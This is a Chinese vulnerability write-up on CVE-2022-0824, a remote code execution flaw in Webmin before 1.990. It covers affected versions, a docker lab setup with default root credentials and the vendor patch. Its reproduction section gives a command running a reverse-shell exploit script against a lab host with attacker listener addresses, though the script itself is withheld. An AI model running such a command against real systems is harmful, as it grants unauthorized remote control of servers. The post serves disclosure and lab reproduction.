【漏洞速递 | 附EXP】CVE-2022-0824_RCE漏洞
2022-12-8 10:40:12 Author: 渗透Xiao白帽(查看原文) 阅读量:71 收藏

0x01 简介

——

Webmin 是一个基于 Web 的 Unix 系统管理界面。使用任何现代网络浏览器,您可以设置用户帐户、Apache、DNS、文件共享等等。在 1.990 之前的GitHub存储库webmin/webmin中对远程代码执行的访问控制不当。

简单地说,就是你可以打开一个浏览器,然后输入 Webmin 的管理地址,在打开的页面中就可以管理你的 Linux/Unix 系统了。

Webmin 功能强大,可以管理设置很多东西,比如用户帐户、Apache 服务、DNS 、文件共享等等,几乎所有的东西都能给你管上一管。

Webmin 是由一个简单的 Web 服务器和一些 CGI 程序组成的系统,Web 服务器和所有 CGI 程序都是使用 Perl 5,并且不使用非标准的 Perl 模块。

它通过管理相应的系统配置文件来实现管理目的,比如它直接通过访问编辑 /etc/passwd 来管理用户密码等等。

0x02漏洞编号

——

CVE编号:CVE-2022-0824CNVD编号:CNVD-2022-17023CNNVD编号::CNNVD-202203-076

0x03 影响版本


Webmin Webmin < Webmin Webmin1.990    1.990版本之前均受影响

0x04 环境搭建

——

直接本地docker搭建命令

docker pull vulfocus/webmin_cve-2022-0824:latestdocker run -itd -p 10000:10000 -d vulfocus/webmin_cve-2022-0824


也可直接vulfocus平台启动环境

环境搭建成功访问如下

username=rootpassword=password

0x05 漏洞复现

——

利用脚本直接反弹shell

python3 Webmin-revshell.py -t http://192.168.232.140:10000 -c root:password -LS 192.168.232.138:9090 -L 192.168.232.138 -P 9999 

反弹shell成功

0x06 修复方案

——


更新到最新版本 附带厂商补丁链接:https://github.com/webmin/webmin/commit/39ea464f0c40b325decd6a5bfb7833fa4a142e38

0x07 EXP获取方式


点击下方名片回复"20221207"获取

文章来源: http://mp.weixin.qq.com/s?__biz=MzI1NTM4ODIxMw==&mid=2247495063&idx=1&sn=6e54aa87772713de33e19086c4b77d74&chksm=ea3412cddd439bdbbcb346cc880702d738ac23114f24b4dd93fb4e8376e9846039105168c909#rd
如有侵权请联系:admin#unsafe.sh